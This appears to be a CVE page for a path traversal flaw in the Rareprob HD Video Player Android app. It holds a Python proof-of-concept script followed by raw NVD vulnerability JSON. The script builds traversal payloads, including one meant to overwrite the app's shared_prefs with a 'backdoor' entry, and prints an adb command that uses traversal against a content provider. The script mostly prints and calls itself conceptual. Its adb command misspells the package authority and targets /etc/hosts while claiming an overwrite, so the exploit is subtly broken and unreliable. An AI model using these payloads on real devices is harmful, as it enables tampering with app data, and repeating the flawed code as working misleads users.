CVE-2025-13876

''' CVE-2025-13876 PoC - Rareprob HD Video Player Path Traversal Arbitrary File Overwrite Vulnerability ''' import os import subprocess import tempfile def create_malicious_video(): """Create a malicious video file with path traversal payload""" # Path traversal sequence to reach external directories traversal_path = "../../../../data/data/com.rocks.music.videoplayer/shared_prefs/" target_file = "settings.xml" # Malicious content to overwrite malicious_content = '''<?xml version="1.0" encoding="utf-8"?> <resources> <string name="backdoor">enabled</string> </resources> ''' # Construct the full malicious path malicious_path = traversal_path + target_file print(f"[*] Target Path: {malicious_path}") print(f"[*] Content Length: {len(malicious_content)} bytes") return malicious_path, malicious_content def exploit_via_content_provider(): """ Exploit path traversal via exported ContentProvider This is a conceptual PoC - actual exploitation requires proper Android environment setup """ print("=" * 60) print("CVE-2025-13876 Path Traversal Exploitation PoC") print("=" * 60) # Step 1: Identify vulnerable component print("\n[Step 1] Identifying vulnerable component...") print("Component: com.rocks.music.videoplayer") # Step 2: Generate malicious path print("\n[Step 2] Generating malicious file path...") path, content = create_malicious_video() # Step 3: Demonstrate path traversal print("\n[Step 3] Path traversal payload:") print(f" Input: {path}") print(f" Resolved: /data/data/com.rocks.music.videoplayer/shared_prefs/settings.xml") # Step 4: File overwrite demonstration print("\n[Step 4] File overwrite scenario:") print(f" Target: {content.split(chr(10))[1]}") print(f" Result: Arbitrary file overwrite in app sandbox") # Step 5: Impact assessment print("\n[Step 5] Potential impact:") impacts = [ "1. Overwrite application configuration files", "2. Modify shared preferences for privilege escalation", "3. Inject malicious code into application data", "4. Corrupt application storage leading to DoS" ] for impact in impacts: print(f" {impact}") print("\n[*] PoC demonstration complete") print("[*] Note: Actual exploitation requires Android device/emulator") def generate_adb_exploit_command(): """Generate ADB command for exploitation""" print("\n[ADB Exploitation Command]") print("=" * 60) cmd = '''# ADB command to trigger path traversal adb shell am start -a android.intent.action.VIEW \ -d "content://com.rocks.music.videopleler.provider/../../../../etc/hosts" \ -t "video/*"''' print(cmd) if __name__ == "__main__": exploit_via_content_provider() generate_adb_exploit_command()

{"cve": {"id": "CVE-2025-13876", "sourceIdentifier": "[email protected]", "published": "2025-12-02T15:15:50.350", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Rareprob HD Video Player All Formats App 12.1.372 on Android. Impacted is an unknown function of the component com.rocks.music.videoplayer. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rareprob:hd_video_player_all_formats:12.1.372:*:*:*:*:*:*:*", "matchCriteriaId": "86230AFC-7F6F-4371-AF3C-786695AAFBC1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*", "matchCriteriaId": "8255F035-04C8-4158-B301-82101711939C"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/blob/main/HD%20Video%20Player%20All%20Formats/HD%20Video%20Player%20All%20Formats%20APP%20Arbitrary%20File%20Overwrite%20Vulnerability.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334032", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334032", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.692169", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}